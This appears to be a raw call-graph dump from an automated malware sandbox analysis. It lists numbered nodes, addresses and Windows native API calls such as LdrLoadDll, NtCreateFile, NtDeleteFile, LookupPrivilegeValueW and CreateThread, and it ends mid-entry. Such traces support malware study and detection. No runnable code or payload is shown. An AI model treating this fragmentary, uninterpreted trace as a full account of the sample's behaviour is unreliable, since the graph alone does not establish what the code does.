33140 2c3c960 2 API calls 33140->33142 33141->33140 33142->33064 33165 2c3cad0 33143->33165 33147 2c3d839 33146->33147 33168 2c37420 33147->33168 33149 2c3d851 33150 2c3d85a 33149->33150 33207 2c3d660 33149->33207 33150->33119 33152 2c3d86e 33152->33150 33224 2c3c3d0 33152->33224 33154 2c3d8a2 33229 2c3e3d0 33154->33229 33518 2c27660 33157->33518 33159 2c29e91 33159->33121 33160 2c29e8a 33160->33159 33531 2c27920 33160->33531 33163->33113 33164->33123 33166 2c3d4a0 LdrLoadDll 33165->33166 33167 2c3afd5 33166->33167 33167->33117 33169 2c37763 33168->33169 33170 2c37434 33168->33170 33169->33149 33170->33169 33232 2c3c120 33170->33232 33173 2c37565 33238 2c3c830 33173->33238 33174 2c37548 33235 2c3c930 33174->33235 33177 2c37552 33177->33149 33178 2c3758c 33179 2c3e3d0 2 API calls 33178->33179 33180 2c37598 33179->33180 33180->33177 33181 2c37727 33180->33181 33182 2c3773d 33180->33182 33187 2c37630 33180->33187 33183 2c3c960 2 API calls 33181->33183 33295 2c37140 33182->33295 33184 2c3772e 33183->33184 33184->33149 33186 2c37750 33186->33149 33188 2c37697 33187->33188 33190 2c3763f 33187->33190 33188->33181 33189 2c376aa 33188->33189 33335 2c3c7b0 33189->33335 33192 2c37644 33190->33192 33193 2c37658 33190->33193 33334 2c37000 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33192->33334 33196 2c37675 33193->33196 33197 2c3765d 33193->33197 33196->33184 33253 2c36dc0 33196->33253 33241 2c370a0 33197->33241 33199 2c3764e 33199->33149 33201 2c3770a 33204 2c3c960 2 API calls 33201->33204 33202 2c3766b 33202->33149 33206 2c37716 33204->33206 33205 2c3768d 33205->33149 33206->33149 33208 2c3d67b 33207->33208 33209 2c3d68d 33208->33209 33210 2c3e350 2 API calls 33208->33210 33209->33152 33211 2c3d6ad 33210->33211 33362 2c36a20 33211->33362 33213 2c3d6d0 33213->33209 33214 2c36a20 3 API calls 33213->33214 33216 2c3d6f2 33214->33216 33216->33209 33394 2c37d80 33216->33394 33217 2c3d77a 33218 2c3d78a 33217->33218 33489 2c3d420 LdrLoadDll 33217->33489 33405 2c3d290 33218->33405 33221 2c3d7b8 33484 2c3c390 33221->33484 33223 2c3d7e2 33223->33152 33225 2c3c3ec 33224->33225 33226 2c3d4a0 LdrLoadDll 33224->33226 33512 326967a 33225->33512 33226->33225 33227 2c3c407 33227->33154 33230 2c3d8cc 33229->33230 33515 2c3cb40 33229->33515 33230->33119 33233 2c3d4a0 LdrLoadDll 33232->33233 33234 2c37519 33233->33234 33234->33173 33234->33174 33234->33177 33236 2c3d4a0 LdrLoadDll 33235->33236 33237 2c3c94c NtDeleteFile 33236->33237 33237->33177 33239 2c3d4a0 LdrLoadDll 33238->33239 33240 2c3c84c NtCreateFile 33239->33240 33240->33178 33242 2c370bc 33241->33242 33243 2c3c7b0 LdrLoadDll 33242->33243 33244 2c370dd 33243->33244 33245 2c370e4 33244->33245 33246 2c370f8 33244->33246 33247 2c3c960 2 API calls 33245->33247 33248 2c3c960 2 API calls 33246->33248 33249 2c370ed 33247->33249 33250 2c37101 33248->33250 33249->33202 33339 2c3e4f0 LdrLoadDll RtlAllocateHeap 33250->33339 33252 2c3710c 33252->33202 33254 2c36e0b 33253->33254 33255 2c36e3e 33253->33255 33256 2c3c7b0 LdrLoadDll 33254->33256 33257 2c36f86 33255->33257 33261 2c36e5a 33255->33261 33258 2c36e26 33256->33258 33259 2c3c7b0 LdrLoadDll 33257->33259 33260 2c3c960 2 API calls 33258->33260 33265 2c36fa1 33259->33265 33262 2c36e2f 33260->33262 33263 2c3c7b0 LdrLoadDll 33261->33263 33262->33205 33264 2c36e75 33263->33264 33267 2c36e91 33264->33267 33268 2c36e7c 33264->33268 33352 2c3c7f0 LdrLoadDll 33265->33352 33271 2c36e96 33267->33271 33272 2c36eac 33267->33272 33270 2c3c960 2 API calls 33268->33270 33269 2c36fdb 33274 2c3c960 2 API calls 33269->33274 33275 2c36e85 33270->33275 33273 2c3c960 2 API calls 33271->33273 33280 2c36eb1 33272->33280 33340 2c3e4b0 33272->33340 33276 2c36e9f 33273->33276 33277 2c36fe6 33274->33277 33275->33205 33276->33205 33277->33205 33282 2c36ec0 33280->33282 33343 2c3c8e0 33280->33343 33281 2c36f14 33283 2c36f2b 33281->33283 33351 2c3c770 LdrLoadDll 33281->33351 33282->33205 33285 2c36f32 33283->33285 33286 2c36f47 33283->33286 33287 2c3c960 2 API calls 33285->33287 33288 2c3c960 2 API calls 33286->33288 33287->33282 33289 2c36f50 33288->33289 33290 2c36f7c 33289->33290 33346 2c3e1d0 33289->33346 33290->33205 33292 2c36f67 33293 2c3e3d0 2 API calls 33292->33293 33294 2c36f70 33293->33294 33294->33205 33296 2c37147 33295->33296 33297 2c3c7b0 LdrLoadDll 33296->33297 33298 2c3717e 33297->33298 33299 2c37187 33298->33299 33300 2c3719c 33298->33300 33301 2c3c960 2 API calls 33299->33301 33302 2c371c0 33300->33302 33303 2c37207 33300->33303 33315 2c37190 33301->33315 33304 2c3c890 2 API calls 33302->33304 33305 2c37249 33303->33305 33306 2c3720c 33303->33306 33307 2c371e2 33304->33307 33308 2c3725b 33305->33308 33314 2c373d3 33305->33314 33310 2c3c8e0 2 API calls 33306->33310 33306->33315 33309 2c3c960 2 API calls 33307->33309 33311 2c37260 33308->33311 33321 2c3729b 33308->33321 33309->33315 33312 2c37233 33310->33312 33313 2c3c890 2 API calls 33311->33313 33316 2c3c960 2 API calls 33312->33316 33317 2c37283 33313->33317 33314->33315 33318 2c3c960 2 API calls 33314->33318 33315->33186 33319 2c3723c 33316->33319 33322 2c3c960 2 API calls 33317->33322 33323 2c37404 33318->33323 33319->33186 33320 2c372a0 33320->33315 33325 2c3c890 2 API calls 33320->33325 33321->33320 33329 2c3737c 33321->33329 33324 2c3728c 33322->33324 33323->33186 33324->33186 33326 2c372c3 33325->33326 33327 2c3c960 2 API calls 33326->33327 33328 2c372ce 33327->33328 33328->33186 33329->33315 33356 2c3c890 33329->33356 33332 2c3c960 2 API calls 33333 2c373c4 33332->33333 33333->33186 33334->33199 33336 2c376f2 33335->33336 33337 2c3d4a0 LdrLoadDll 33335->33337 33338 2c3c7f0 LdrLoadDll 33336->33338 33337->33336 33338->33201 33339->33252 33342 2c3e4c8 33340->33342 33353 2c3cb00 33340->33353 33342->33280 33344 2c3c8fc NtReadFile 33343->33344 33345 2c3d4a0 LdrLoadDll 33343->33345 33344->33281 33345->33344 33347 2c3e1f4 33346->33347 33348 2c3e1dd 33346->33348 33347->33292 33348->33347 33349 2c3e4b0 2 API calls 33348->33349 33350 2c3e20b 33349->33350 33350->33292 33351->33283 33352->33269 33354 2c3d4a0 LdrLoadDll 33353->33354 33355 2c3cb1c RtlAllocateHeap 33354->33355 33355->33342 33357 2c3c8ac 33356->33357 33358 2c3d4a0 LdrLoadDll 33356->33358 33361 3269560 LdrInitializeThunk 33357->33361 33358->33357 33359 2c373bb 33359->33332 33361->33359 33363 2c36a31 33362->33363 33364 2c36a39 33362->33364 33363->33213 33393 2c36d0c 33364->33393 33490 2c3f550 33364->33490 33366 2c36a8d 33367 2c3f550 2 API calls 33366->33367 33371 2c36a98 33367->33371 33368 2c36ae6 33370 2c3f550 2 API calls 33368->33370 33374 2c36afa 33370->33374 33371->33368 33498 2c3f5f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33371->33498 33499 2c3f680 33371->33499 33373 2c36b57 33375 2c3f550 2 API calls 33373->33375 33374->33373 33376 2c3f680 3 API calls 33374->33376 33378 2c36b6d 33375->33378 33376->33374 33377 2c36baa 33379 2c3f550 2 API calls 33377->33379 33378->33377 33380 2c3f680 3 API calls 33378->33380 33381 2c36bb5 33379->33381 33380->33378 33382 2c3f680 3 API calls 33381->33382 33389 2c36bef 33381->33389 33382->33381 33385 2c3f5b0 2 API calls 33386 2c36cee 33385->33386 33387 2c3f5b0 2 API calls 33386->33387 33388 2c36cf8 33387->33388 33390 2c3f5b0 2 API calls 33388->33390 33495 2c3f5b0 33389->33495 33391 2c36d02 33390->33391 33392 2c3f5b0 2 API calls 33391->33392 33392->33393 33393->33213 33395 2c37d91 33394->33395 33396 2c37420 10 API calls 33395->33396 33400 2c37da7 33396->33400 33397 2c37db0 33397->33217 33398 2c37de7 33399 2c3e3d0 2 API calls 33398->33399 33401 2c37df8 33399->33401 33400->33397 33400->33398 33402 2c37e33 33400->33402 33401->33217 33403 2c3e3d0 2 API calls 33402->33403 33404 2c37e38 33403->33404 33404->33217 33406 2c3d2a4 33405->33406 33407 2c3d120 LdrLoadDll 33405->33407 33505 2c3d120 33406->33505 33407->33406 33409 2c3d2ad 33410 2c3d120 LdrLoadDll 33409->33410 33411 2c3d2b6 33410->33411 33412 2c3d120 LdrLoadDll 33411->33412 33413 2c3d2bf 33412->33413 33414 2c3d120 LdrLoadDll 33413->33414 33415 2c3d2c8 33414->33415 33416 2c3d120 LdrLoadDll 33415->33416 33417 2c3d2d1 33416->33417 33418 2c3d120 LdrLoadDll 33417->33418 33419 2c3d2dd 33418->33419 33420 2c3d120 LdrLoadDll 33419->33420 33421 2c3d2e6 33420->33421 33422 2c3d120 LdrLoadDll 33421->33422 33423 2c3d2ef 33422->33423 33424 2c3d120 LdrLoadDll 33423->33424 33425 2c3d2f8 33424->33425 33426 2c3d120 LdrLoadDll 33425->33426 33427 2c3d301 33426->33427 33428 2c3d120 LdrLoadDll 33427->33428 33429 2c3d30a 33428->33429 33430 2c3d120 LdrLoadDll 33429->33430 33431 2c3d316 33430->33431 33432 2c3d120 LdrLoadDll 33431->33432 33433 2c3d31f 33432->33433 33434 2c3d120 LdrLoadDll 33433->33434 33435 2c3d328 33434->33435 33436 2c3d120 LdrLoadDll 33435->33436 33437 2c3d331 33436->33437 33438 2c3d120 LdrLoadDll 33437->33438 33439 2c3d33a 33438->33439 33440 2c3d120 LdrLoadDll 33439->33440 33441 2c3d343 33440->33441 33442 2c3d120 LdrLoadDll 33441->33442 33443 2c3d34f 33442->33443 33444 2c3d120 LdrLoadDll 33443->33444 33445 2c3d358 33444->33445 33446 2c3d120 LdrLoadDll 33445->33446 33447 2c3d361 33446->33447 33448 2c3d120 LdrLoadDll 33447->33448 33449 2c3d36a 33448->33449 33450 2c3d120 LdrLoadDll 33449->33450 33451 2c3d373 33450->33451 33452 2c3d120 LdrLoadDll 33451->33452 33453 2c3d37c 33452->33453 33454 2c3d120 LdrLoadDll 33453->33454 33455 2c3d388 33454->33455 33456 2c3d120 LdrLoadDll 33455->33456 33457 2c3d391 33456->33457 33458 2c3d120 LdrLoadDll 33457->33458 33459 2c3d39a 33458->33459 33460 2c3d120 LdrLoadDll 33459->33460 33461 2c3d3a3 33460->33461 33462 2c3d120 LdrLoadDll 33461->33462 33463 2c3d3ac 33462->33463 33464 2c3d120 LdrLoadDll 33463->33464 33465 2c3d3b5 33464->33465 33466 2c3d120 LdrLoadDll 33465->33466 33467 2c3d3c1 33466->33467 33468 2c3d120 LdrLoadDll 33467->33468 33469 2c3d3ca 33468->33469 33470 2c3d120 LdrLoadDll 33469->33470 33471 2c3d3d3 33470->33471 33472 2c3d120 LdrLoadDll 33471->33472 33473 2c3d3dc 33472->33473 33474 2c3d120 LdrLoadDll 33473->33474 33475 2c3d3e5 33474->33475 33476 2c3d120 LdrLoadDll 33475->33476 33477 2c3d3ee 33476->33477 33478 2c3d120 LdrLoadDll 33477->33478 33479 2c3d3fa 33478->33479 33480 2c3d120 LdrLoadDll 33479->33480 33481 2c3d403 33480->33481 33482 2c3d120 LdrLoadDll 33481->33482 33483 2c3d40c 33482->33483 33483->33221 33485 2c3d4a0 LdrLoadDll 33484->33485 33486 2c3c3ac 33485->33486 33511 3269860 LdrInitializeThunk 33486->33511 33487 2c3c3c3 33487->33223 33489->33218 33491 2c3f560 33490->33491 33492 2c3f566 33490->33492 33491->33366 33493 2c3e4b0 2 API calls 33492->33493 33494 2c3f58c 33493->33494 33494->33366 33496 2c36ce4 33495->33496 33497 2c3e3d0 2 API calls 33495->33497 33496->33385 33497->33496 33498->33371 33500 2c3f5f0 33499->33500 33501 2c3f64d 33500->33501 33502 2c3e4b0 2 API calls 33500->33502 33501->33371 33503 2c3f62a 33502->33503 33504 2c3e3d0 2 API calls 33503->33504 33504->33501 33506 2c3d13b 33505->33506 33507 2c37830 LdrLoadDll 33506->33507 33508 2c3d15b 33507->33508 33509 2c37830 LdrLoadDll 33508->33509 33510 2c3d20f 33508->33510 33509->33510 33510->33409 33510->33510 33511->33487 33513 3269681 33512->33513 33514 326968f LdrInitializeThunk 33512->33514 33513->33227 33514->33227 33516 2c3cb5c RtlFreeHeap 33515->33516 33517 2c3d4a0 LdrLoadDll 33515->33517 33516->33230 33517->33516 33519 2c27670 33518->33519 33520 2c2766b 33518->33520 33521 2c3e350 2 API calls 33519->33521 33520->33160 33527 2c27695 33521->33527 33522 2c276f8 33522->33160 33523 2c3c390 2 API calls 33523->33527 33524 2c276fe 33526 2c27724 33524->33526 33528 2c3ca90 2 API calls 33524->33528 33526->33160 33527->33522 33527->33523 33527->33524 33529 2c3e350 2 API calls 33527->33529 33534 2c3ca90 33527->33534 33530 2c27715 33528->33530 33529->33527 33530->33160 33532 2c2793e 33531->33532 33533 2c3ca90 2 API calls 33531->33533 33532->33121 33533->33532 33535 2c3d4a0 LdrLoadDll 33534->33535 33536 2c3caac 33535->33536 33539 32696e0 LdrInitializeThunk 33536->33539 33537 2c3cac3 33537->33527 33539->33537 33541 2c3db33 33540->33541 33542 2c2b150 LdrLoadDll 33541->33542 33543 2c2a001 33542->33543 33543->33129 33546 2c2b4c3 33544->33546 33545 2c2b540 33545->33134 33546->33545 33556 2c3c160 LdrLoadDll 33546->33556 33549 2c3ccbf LookupPrivilegeValueW 33548->33549 33550 2c3d4a0 LdrLoadDll 33548->33550 33549->33138 33550->33549 33552 2c3c74c 33551->33552 33553 2c3d4a0 LdrLoadDll 33551->33553 33557 3269910 LdrInitializeThunk 33552->33557 33553->33552 33554 2c3c76b 33554->33141 33556->33545 33557->33554 33559 2c2b647 33558->33559 33560 2c2b4a0 LdrLoadDll 33559->33560 33561 2c2b6aa 33560->33561 33561->33080 33563 2c2b394 33562->33563 33608 2c3c160 LdrLoadDll 33563->33608 33565 2c2b3ce 33565->33082 33567 2c2e33c 33566->33567 33568 2c2b620 LdrLoadDll 33567->33568 33569 2c2e34e 33568->33569 33609 2c2e1e0 33569->33609 33572 2c2e369 33574 2c3c960 2 API calls 33572->33574 33575 2c2e374 33572->33575 33573 2c2e381 33576 2c3c960 2 API calls 33573->33576 33577 2c2e392 33573->33577 33574->33575 33575->33085 33576->33577 33577->33085 33579 2c2c8a6 33578->33579 33580 2c2c8b0 33578->33580 33579->33094 33581 2c2b4a0 LdrLoadDll 33580->33581 33582 2c2c921 33581->33582 33583 2c2b370 LdrLoadDll 33582->33583 33584 2c2c935 33583->33584 33585 2c2c958 33584->33585 33586 2c2b4a0 LdrLoadDll 33584->33586 33585->33094 33587 2c2c974 33586->33587 33588 2c37420 10 API calls 33587->33588 33589 2c2c9c9 33588->33589 33589->33094 33629 2c2e5d0 33590->33629 33592 2c28d8a 33593 2c290e1 33592->33593 33635 2c36d50 33592->33635 33593->33107 33595 2c3f550 2 API calls 33596 2c28f82 33595->33596 33598 2c3f680 3 API calls 33596->33598 33597 2c28de6 33597->33593 33597->33595 33603 2c28f97 33598->33603 33599 2c27660 4 API calls 33599->33603 33603->33593 33603->33599 33604 2c27920 2 API calls 33603->33604 33638 2c2c5d0 33603->33638 33688 2c2e570 33603->33688 33692 2c2dfd0 33603->33692 33604->33603 33605->33089 33606->33099 33607->33108 33608->33565 33610 2c2e1fa 33609->33610 33618 2c2e2b0 33609->33618 33611 2c2b4a0 LdrLoadDll 33610->33611 33612 2c2e21c 33611->33612 33619 2c3c410 33612->33619 33614 2c2e25e 33615 2c2e2a4 33614->33615 33623 2c3c450 33614->33623 33617 2c3c960 2 API calls 33615->33617 33617->33618 33618->33572 33618->33573 33620 2c3c426 33619->33620 33621 2c3d4a0 LdrLoadDll 33620->33621 33622 2c3c42c 33621->33622 33622->33614 33624 2c3c46c 33623->33624 33625 2c3d4a0 LdrLoadDll 33623->33625 33628 3269fe0 LdrInitializeThunk 33624->33628 33625->33624 33626 2c3c483 33626->33615 33628->33626 33630 2c2e5dd 33629->33630 33631 2c37830 LdrLoadDll 33630->33631 33632 2c2e5f5 33631->33632 33633 2c2e603 33632->33633 33634 2c2e5fc SetErrorMode 33632->33634 33633->33592 33634->33633 33637 2c36d76 33635->33637 33706 2c2e3a0 33635->33706 33637->33597 33639 2c2c5ef 33638->33639 33640 2c2c5e9 33638->33640 33733 2c29bc0 33639->33733 33726 2c2dca0 33640->33726 33643 2c2c5fc 33644 2c3f680 3 API calls 33643->33644 33687 2c2c87b 33643->33687 33645 2c2c618 33644->33645 33646 2c2e570 2 API calls 33645->33646 33647 2c2c62c 33645->33647 33646->33647 33742 2c3c1e0 33647->33742 33650 2c2c756 33749 2c2c570 LdrLoadDll LdrInitializeThunk 33650->33749 33651 2c3c3d0 2 API calls 33652 2c2c6aa 33651->33652 33652->33650 33657 2c2c6b6 33652->33657 33654 2c2c775 33655 2c2c77d 33654->33655 33750 2c2c4e0 LdrLoadDll NtClose LdrInitializeThunk 33654->33750 33658 2c3c960 2 API calls 33655->33658 33656 2c2c6ff 33663 2c3c960 2 API calls 33656->33663 33657->33656 33660 2c3c4e0 2 API calls 33657->33660 33657->33687 33661 2c2c787 33658->33661 33660->33656 33661->33603 33662 2c2c79f 33662->33655 33664 2c2c7a6 33662->33664 33665 2c2c71c 33663->33665 33666 2c2c7be 33664->33666 33751 2c2c460 LdrLoadDll LdrInitializeThunk 33664->33751 33745 2c3b840 33665->33745 33752 2c3c260 LdrLoadDll 33666->33752 33669 2c2c733 33669->33687 33748 2c27ad0 LdrLoadDll 33669->33748 33671 2c2c7d2 33753 2c2c2c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33671->33753 33674 2c2c74c 33674->33603 33675 2c2c7f6 33676 2c2c837 33675->33676 33754 2c3c290 LdrLoadDll 33675->33754 33756 2c3c2f0 LdrLoadDll 33676->33756 33679 2c2c814 33679->33676 33755 2c3c320 LdrLoadDll 33679->33755 33680 2c2c845 33681 2c3c960 2 API calls 33680->33681 33682 2c2c84f 33681->33682 33684 2c3c960 2 API calls 33682->33684 33685 2c2c859 33684->33685 33685->33687 33757 2c27ad0 LdrLoadDll 33685->33757 33687->33603 33689 2c2e583 33688->33689 33779 2c3c360 33689->33779 33693 2c2e001 33692->33693 33694 2c2dfe4 33692->33694 33698 2c2e040 33693->33698 33805 2c2dc20 33693->33805 33694->33693 33785 2c2dde0 33694->33785 33699 2c2e072 33698->33699 33827 2c2d5d0 12 API calls 33698->33827 33700 2c2e098 33699->33700 33828 2c3af70 12 API calls 33699->33828 33700->33603 33705 2c37420 10 API calls 33705->33698 33707 2c2e3bd 33706->33707 33713 2c3c490 33707->33713 33710 2c2e405 33710->33637 33714 2c3c4ac 33713->33714 33715 2c3d4a0 LdrLoadDll 33713->33715 33724 32699a0 LdrInitializeThunk 33714->33724 33715->33714 33716 2c2e3fe 33716->33710 33718 2c3c4e0 33716->33718 33719 2c3c4e6 33718->33719 33720 2c3d4a0 LdrLoadDll 33719->33720 33721 2c3c4fc 33720->33721 33725 3269780 LdrInitializeThunk 33721->33725 33722 2c2e42e 33722->33637 33724->33716 33725->33722 33731 2c2dcbe 33726->33731 33758 2c2d650 33726->33758 33728 2c2ddc2 33729 2c3e4b0 2 API calls 33728->33729 33730 2c2ddd1 33729->33730 33730->33639 33731->33728 33767 2c3b6c0 33731->33767 33735 2c29bdb 33733->33735 33734 2c29cfb 33734->33643 33735->33734 33736 2c2e1e0 3 API calls 33735->33736 33737 2c29cdc 33736->33737 33738 2c29d0a 33737->33738 33739 2c29cf1 33737->33739 33740 2c3c960 2 API calls 33737->33740 33738->33643 33778 2c26c90 LdrLoadDll 33739->33778 33740->33739 33743 2c2c680 33742->33743 33744 2c3d4a0 LdrLoadDll 33742->33744 33743->33650 33743->33651 33743->33687 33744->33743 33746 2c2e570 2 API calls 33745->33746 33747 2c3b872 33746->33747 33747->33669 33748->33674 33749->33654 33750->33662 33751->33666 33752->33671 33753->33675 33754->33679 33755->33676 33756->33680 33757->33687 33759 2c2d683 33758->33759 33773 2c2b790 33759->33773 33761 2c2d695 33762 2c2e3a0 3 API calls 33761->33762 33763 2c2d6d8 33762->33763 33764 2c2d6df 33763->33764 33777 2c3e4f0 LdrLoadDll RtlAllocateHeap 33763->33777 33764->33731 33766 2c2d6ef 33766->33731 33768 2c3b6cf 33767->33768 33769 2c37830 LdrLoadDll 33768->33769 33770 2c3b6e7 33769->33770 33771 2c3b70d 33770->33771 33772 2c3b6fa CreateThread 33770->33772 33771->33728 33772->33728 33774 2c2b7b7 33773->33774 33775 2c2b4a0 LdrLoadDll 33774->33775 33776 2c2b7f3 33775->33776 33776->33761 33777->33766 33778->33734 33780 2c3d4a0 LdrLoadDll 33779->33780 33781 2c3c37c 33780->33781 33784 3269840 LdrInitializeThunk 33781->33784 33782 2c2e5ae 33782->33603 33784->33782 33786 2c2de10 33785->33786 33829 2c36740 33786->33829 33788 2c2de61 33858 2c355b0 33788->33858 33790 2c2de67 33892 2c323a0 33790->33892 33792 2c2de6d 33923 2c34610 33792->33923 33798 2c2de81 33967 2c35e50 33798->33967 33800 2c2de87 33991 2c2fce0 33800->33991 33802 2c2de9f 34006 2c30f80 33802->34006 33806 2c2dc38 33805->33806 33810 2c2dc8f 33805->33810 33807 2c311c0 10 API calls 33806->33807 33806->33810 33808 2c2dc79 33807->33808 33808->33810 34291 2c31410 12 API calls 33808->34291 33810->33700 33811 2c2da60 33810->33811 33812 2c2da7c 33811->33812 33817 2c2db5b 33811->33817 33815 2c3c960 2 API calls 33812->33815 33812->33817 33813 2c2dbf1 33814 2c2dc0e 33813->33814 33816 2c37420 10 API calls 33813->33816 33814->33698 33814->33705 33818 2c2da97 33815->33818 33816->33814 33817->33813 34293 2c2cf50 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33817->34293 34292 2c2cf50 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33818->34292 33820 2c2dbcb 33820->33813 34294 2c2d120 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33820->34294 33822 2c2dacf 33824 2c2b4a0 LdrLoadDll 33822->33824 33825 2c2dae0 33824->33825 33826 2c2b4a0 LdrLoadDll 33825->33826 33826->33817 33827->33699 33828->33700 33830 2c36768 33829->33830 33831 2c2b4a0 LdrLoadDll 33830->33831 33832 2c3677c 33831->33832 33833 2c2cd10 3 API calls 33832->33833 33835 2c367af 33833->33835 33834 2c367b6 33834->33788 33835->33834 33836 2c2b4a0 LdrLoadDll 33835->33836 33837 2c367de 33836->33837 33838 2c2b4a0 LdrLoadDll 33837->33838 33839 2c36802 33838->33839 34011 2c2cdd0 33839->34011 33841 2c36868 33843 2c2b4a0 LdrLoadDll 33841->33843 33842 2c36826 33842->33841 33855 2c369eb 33842->33855 34015 2c36490 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 33842->34015 33845 2c36888 33843->33845 33846 2c2cdd0 2 API calls 33845->33846 33849 2c368ac 33846->33849 33847 2c368f2 33848 2c2cdd0 2 API calls 33847->33848 33852 2c36922 33848->33852 33849->33847 33849->33855 34016 2c36490 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 33849->34016 33851 2c36968 33854 2c2cdd0 2 API calls 33851->33854 33852->33851 33852->33855 34017 2c36490 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 33852->34017 33857 2c369c7 33854->33857 33855->33788 33857->33855 34018 2c36490 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 33857->34018 33859 2c35614 33858->33859 33860 2c2b4a0 LdrLoadDll 33859->33860 33861 2c356e1 33860->33861 33862 2c2cd10 3 API calls 33861->33862 33864 2c35714 33862->33864 33863 2c3571b 33863->33790 33864->33863 33865 2c2b4a0 LdrLoadDll 33864->33865 33866 2c35743 33865->33866 33867 2c2cdd0 2 API calls 33866->33867 33869 2c35783 33867->33869 33868 2c358a3 33868->33790 33869->33868 33870 2c358b2 33869->33870 34025 2c353a0 33869->34025 33871 2c3c960 2 API calls 33870->33871 33873 2c358bc 33871->33873 33873->33790 33874 2c357b8 33874->33870 33875 2c357c3 33874->33875 33876 2c3e4b0 2 API calls 33875->33876 33877 2c357ec 33876->33877 33878 2c357f5 33877->33878 33879 2c3580b 33877->33879 33881 2c3c960 2 API calls 33878->33881 34054 2c35290 CoInitialize 33879->34054 33883 2c357ff 33881->33883 33882 2c35819 34056 2c3c670 33882->34056 33883->33790 33885 2c35892 33886 2c3c960 2 API calls 33885->33886 33888 2c3589c 33886->33888 33889 2c3e3d0 2 API calls 33888->33889 33889->33868 33890 2c35837 33890->33885 33891 2c3c670 2 API calls 33890->33891 34061 2c351c0 LdrLoadDll RtlFreeHeap 33890->34061 33891->33890 33893 2c323c8 33892->33893 33894 2c3e4b0 2 API calls 33893->33894 33895 2c32428 33894->33895 33896 2c32431 33895->33896 34063 2c31800 33895->34063 33896->33792 33898 2c3245a 33899 2c3247a 33898->33899 34093 2c31b10 LdrLoadDll 33898->34093 33900 2c32498 33899->33900 34095 2c34110 12 API calls 33899->34095 33908 2c324b2 33900->33908 34097 2c2b2a0 LdrLoadDll 33900->34097 33903 2c32468 33903->33899 34094 2c32120 10 API calls 33903->34094 33904 2c3248c 34096 2c34110 12 API calls 33904->34096 33909 2c31800 12 API calls 33908->33909 33910 2c324df 33909->33910 33911 2c32500 33910->33911 34098 2c31b10 LdrLoadDll 33910->34098 33913 2c3251e 33911->33913 34100 2c34110 12 API calls 33911->34100 33916 2c32538 33913->33916 34102 2c2b2a0 LdrLoadDll 33913->34102 33914 2c324ee 33914->33911 34099 2c32120 10 API calls 33914->34099 33917 2c3e3d0 2 API calls 33916->33917 33920 2c32542 33917->33920 33918 2c32512 34101 2c34110 12 API calls 33918->34101 33920->33792 33924 2c34636 33923->33924 33925 2c2b4a0 LdrLoadDll 33924->33925 33926 2c34665 33925->33926 33927 2c2b4a0 LdrLoadDll 33926->33927 33928 2c34691 33926->33928 33927->33928 34122 2c2e7d0 33928->34122 33930 2c34775 33931 2c2de75 33930->33931 34127 2c34320 33930->34127 33933 2c358d0 33931->33933 33934 2c2de7b 33933->33934 33935 2c34610 12 API calls 33933->33935 33936 2c33330 33934->33936 33935->33934 33937 2c33352 33936->33937 33938 2c2b4a0 LdrLoadDll 33937->33938 33939 2c3351d 33938->33939 33940 2c2b4a0 LdrLoadDll 33939->33940 33941 2c3352e 33940->33941 33942 2c2b370 LdrLoadDll 33941->33942 33943 2c33545 33942->33943 34207 2c331f0 33943->34207 33946 2c331f0 13 API calls 33947 2c335bb 33946->33947 33948 2c331f0 13 API calls 33947->33948 33949 2c335d3 33948->33949 33950 2c331f0 13 API calls 33949->33950 33951 2c335eb 33950->33951 33952 2c331f0 13 API calls 33951->33952 33953 2c33603 33952->33953 33954 2c331f0 13 API calls 33953->33954 33956 2c3361e 33954->33956 33955 2c33638 33955->33798 33956->33955 33957 2c331f0 13 API calls 33956->33957 33958 2c3366c 33957->33958 33959 2c331f0 13 API calls 33958->33959 33960 2c336a9 33959->33960 33961 2c331f0 13 API calls 33960->33961 33962 2c336e6 33961->33962 33963 2c331f0 13 API calls 33962->33963 33964 2c33723 33963->33964 33965 2c331f0 13 API calls 33964->33965 33966 2c33760 33965->33966 33966->33798 33968 2c35e59 33967->33968 33969 2c2b150 LdrLoadDll 33968->33969 33970 2c35e88 33969->33970 33971 2c37830 LdrLoadDll 33970->33971 33988 2c3608c 33970->33988 33972 2c35eb8 33971->33972 33973 2c37830 LdrLoadDll 33972->33973 33974 2c35ed1 33973->33974 33975 2c37830 LdrLoadDll 33974->33975 33976 2c35eea 33975->33976 33977 2c37830 LdrLoadDll 33976->33977 33978 2c35f06 33977->33978 33979 2c37830 LdrLoadDll 33978->33979 33980 2c35f1f 33979->33980 33981 2c37830 LdrLoadDll 33980->33981 33982 2c35f38 33981->33982 33983 2c37830 LdrLoadDll 33982->33983 33984 2c35f54 33983->33984 33985 2c37830 LdrLoadDll 33984->33985 33986 2c35f6d 33985->33986 33987 2c37830 LdrLoadDll 33986->33987 33989 2c35f85 33987->33989 33988->33800 33989->33988 34222 2c35a10 LdrLoadDll 33989->34222 33992 2c2fcf6 33991->33992 34002 2c2fd01 33991->34002 33993 2c3e4b0 2 API calls 33992->33993 33993->34002 33994 2c2fd17 33994->33802 33995 2c37830 LdrLoadDll 33995->34002 33996 2c2fdfc GetFileAttributesW 33996->34002 33997 2c2ff7f 33998 2c2ff98 33997->33998 33999 2c3e3d0 2 API calls 33997->33999 33998->33802 33999->33998 34001 2c2b4a0 LdrLoadDll 34001->34002 34002->33994 34002->33995 34002->33996 34002->33997 34002->34001 34003 2c33770 10 API calls 34002->34003 34223 2c3ab60 34002->34223 34227 2c3a9f0 11 API calls 34002->34227 34228 2c3a890 11 API calls 34002->34228 34003->34002 34229 2c30d00 34006->34229 34008 2c30f8d 34250 2c309e0 34008->34250 34010 2c2deb1 34010->33693 34012 2c2cdf5 34011->34012 34019 2c3c560 34012->34019 34015->33841 34016->33847 34017->33851 34018->33855 34020 2c3d4a0 LdrLoadDll 34019->34020 34021 2c3c57c 34020->34021 34024 32696d0 LdrInitializeThunk 34021->34024 34022 2c2ce69 34022->33842 34024->34022 34026 2c353bc 34025->34026 34027 